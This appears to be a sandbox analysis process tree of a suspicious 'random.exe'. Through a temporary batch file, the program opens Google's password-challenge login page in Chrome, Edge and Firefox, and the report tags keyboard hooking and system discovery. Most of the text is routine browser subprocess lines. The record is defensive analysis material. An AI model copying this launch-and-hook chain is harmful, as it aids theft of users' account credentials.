C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10048 /prefetch:12⤵PID:8404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9352 /prefetch:12⤵PID:5656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:12⤵PID:7508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2876 /prefetch:12⤵PID:9176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:12⤵PID:4320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6332 /prefetch:12⤵PID:4280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6212 /prefetch:82⤵PID:8524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8152 /prefetch:12⤵PID:8624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:12⤵PID:5992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8472 /prefetch:12⤵PID:2708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8824 /prefetch:12⤵PID:7736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9576 /prefetch:12⤵PID:6552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7944 /prefetch:12⤵PID:7340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10064 /prefetch:12⤵PID:5708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:12⤵PID:9136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2520 /prefetch:12⤵PID:8692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:12⤵PID:3992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:12⤵PID:4360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1836 /prefetch:12⤵PID:7684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7792 /prefetch:12⤵PID:4980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5604 /prefetch:82⤵PID:5324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7856 /prefetch:12⤵PID:8896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8124 /prefetch:12⤵PID:1172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7288 /prefetch:12⤵PID:7464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10172 /prefetch:12⤵PID:2792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6332 /prefetch:82⤵PID:6480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7928 /prefetch:82⤵PID:8540
-
-
C:\Users\Admin\Downloads\random.exe"C:\Users\Admin\Downloads\random.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5440 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\30F7.tmp\30F8.tmp\30F9.bat C:\Users\Admin\Downloads\random.exe"3⤵PID:7180
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd"4⤵
- Enumerates system info in registry
PID:5348 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffa4c75cc40,0x7ffa4c75cc4c,0x7ffa4c75cc585⤵PID:8416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2044,i,10645922839996911692,5568753398088847288,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2024 /prefetch:25⤵PID:1064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1988,i,10645922839996911692,5568753398088847288,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2240 /prefetch:35⤵PID:3716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1388,i,10645922839996911692,5568753398088847288,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2304 /prefetch:85⤵PID:6100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,10645922839996911692,5568753398088847288,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3192 /prefetch:15⤵PID:5340
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,10645922839996911692,5568753398088847288,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3252 /prefetch:15⤵PID:4528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4492,i,10645922839996911692,5568753398088847288,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3608 /prefetch:15⤵PID:4864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4620,i,10645922839996911692,5568753398088847288,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4648 /prefetch:85⤵PID:1976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3584,i,10645922839996911692,5568753398088847288,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4704 /prefetch:85⤵
- Modifies registry class
PID:8440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5148,i,10645922839996911692,5568753398088847288,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5156 /prefetch:85⤵PID:1656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4692,i,10645922839996911692,5568753398088847288,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5236 /prefetch:85⤵PID:4428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3160,i,10645922839996911692,5568753398088847288,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1196 /prefetch:85⤵
- Drops file in System32 directory
PID:10068
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd"4⤵PID:7216
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffa527746f8,0x7ffa52774708,0x7ffa527747185⤵PID:5648
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd"4⤵PID:744
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.com/v3/signin/challenge/pwd5⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:1568 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1992 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1904 -prefsLen 23602 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {69873ad6-4c9a-43c3-97fe-14af300dc732} 1568 "\\.\pipe\gecko-crash-server-pipe.1568" gpu6⤵PID:748
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2428 -parentBuildID 20240401114208 -prefsHandle 2404 -prefMapHandle 2344 -prefsLen 24522 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f40af4db-727d-4302-9bec-3a4930f96855} 1568 "\\.\pipe\gecko-crash-server-pipe.1568" socket6⤵PID:7292
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3284 -childID 1 -isForBrowser -prefsHandle 3276 -prefMapHandle 3272 -prefsLen 22590 -prefMapSize 244628 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1af79af-131e-4019-8c46-34b589b9ec9d} 1568 "\\.\pipe\gecko-crash-server-pipe.1568" tab6⤵PID:3992
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3508 -childID 2 -isForBrowser -prefsHandle 2820 -prefMapHandle 3220 -prefsLen 29012 -prefMapSize 244628 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7acec068-39dc-4970-b628-65efef3daae6} 1568 "\\.\pipe\gecko-crash-server-pipe.1568" tab6⤵PID:5228
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4492 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4340 -prefMapHandle 4348 -prefsLen 29012 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd8c084b-d44a-435c-8d40-152e77d3912b} 1568 "\\.\pipe\gecko-crash-server-pipe.1568" utility6⤵
- Checks processor information in registry
PID:2268
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5600 -childID 3 -isForBrowser -prefsHandle 4580 -prefMapHandle 5604 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5633cef8-d088-4114-a3da-bfd07ba28011} 1568 "\\.\pipe\gecko-crash-server-pipe.1568" tab6⤵PID:3988
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5780 -childID 4 -isForBrowser -prefsHandle 5496 -prefMapHandle 5420 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29d4a0f1-69a2-4910-b4cf-ef5602bfa455} 1568 "\\.\pipe\gecko-crash-server-pipe.1568" tab6⤵PID:8748
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5972 -childID 5 -isForBrowser -prefsHandle 5892 -prefMapHandle 5900 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f969612-a45f-4f23-b61f-775de85a4285} 1568 "\\.\pipe\gecko-crash-server-pipe.1568" tab6⤵PID:9024
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6460 -childID 6 -isForBrowser -prefsHandle 6424 -prefMapHandle 6436 -prefsLen 27039 -prefMapSize 244628 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {053da53d-8d08-4950-916f-940f71eace35} 1568 "\\.\pipe\gecko-crash-server-pipe.1568" tab6⤵PID:996
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6664 /prefetch:12⤵PID:7712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=111 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6564 /prefetch:12⤵PID:8992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=112 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3984 /prefetch:12⤵PID:5996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=113 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4672 /prefetch:12⤵PID:9120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=114 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:12⤵PID:7400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=115 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:12⤵PID:7460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=116 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8024 /prefetch:12⤵PID:7596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=117 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:12⤵PID:1984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=118 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10124 /prefetch:12⤵PID:8336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=119 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:12⤵PID:5304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=120 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6776 /prefetch:12⤵PID:392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=123 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9916 /prefetch:12⤵PID:340
-
-
